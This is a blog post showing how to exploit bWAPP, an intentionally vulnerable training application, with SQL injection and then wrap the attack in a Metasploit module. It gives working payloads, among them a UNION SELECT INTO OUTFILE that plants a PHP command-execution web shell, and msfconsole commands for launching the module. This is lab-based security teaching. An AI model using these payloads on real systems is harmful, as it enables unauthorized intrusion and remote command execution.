Saturday, June 28, 2014

bWAPP - Metasploit Modules

Hi little bees,

In this article, I'll show you how you can find an exploit in bWAPP and port it to a Metasploit module to ease the exploitation of your loved bee-box (or any bWAPP aware box).
You probably all know the Mestasploit Framework. If you don't know it yet, you should absolutely take a look at its website and download/install it. If you're using kali linux, Metasploit is present in your beehive.

First, we need a to find a valid exploit. For now, I'll take a basic sql injection to spawn a shell/meterpreter to the box.



I'm a little lazy and basics of sql injection are out of scope, so if you don't' know how to exploit it in bWAPP you can still refer to my (killed in the beehive) bwappexploited site.

So, starting from the fact that this injection works fine well to get the current database :
 
' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
 
We could abuse the SELECT INTO OUTFILE mysql statement to write a php file, our backdoor, to the webserver.
But don't forget you're injecting mysql, so mysql or a group it belongs to should have write perms on the folder where you want to write the backdoor.
An image or document folder is often a good choice as it is often used to upload images through an admin web interface.
In this case, the « images » folder is writable :) (http://yourip/bWAPP/images/)

Our payload could be something like this:

a' UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE "/var/www/bWAPP/images/yabadooo.php" -- -

Of course, change the path if bWAPP is installed in another directory.
If our injection worked , a file named yabadooo.php containing our payload is present in the « images » folder, let's abuse it with « id » command to see which user serves our payload.



It worked ! But ... you already knew it ? ;)

To build a metasploit module, you have to answer to this question : Which steps were necessary to successfully exploit ?

In our case it's rather simple  :
1 – Login to bWAPP
2 – Post evil parameters to inject1.php

Here's the first step details:



As you can see we first connect to bWAPP to store the session cookie, then we use this cookie to login to the bWAPP.
 
Finally, in the second step, we call the hive function to login then we send the evil request to get our shell.
Metasploit generates the payload for us, just replace php commands in the sql injection by « payload.encoded » and let MSF do its job.



The big part of the job is done, you'll understand the meaning of it all while reading, I let you explore the final script.

You'll find the msf module here, just copy/paste it in MSF modules folder.
Kali users can drop it in /usr/share/metasploit-framework/modules/exploits/multi/http/ .
Start msfconsole and type :
> use exploit/multi/http/bwapp-sqli
> set RHOST <bWAPP IP ADDRESS>
> exploit -j

And magic happens :)

That's all bees,
Thanks for reading !

David Bloom
Twitter : @philophobia78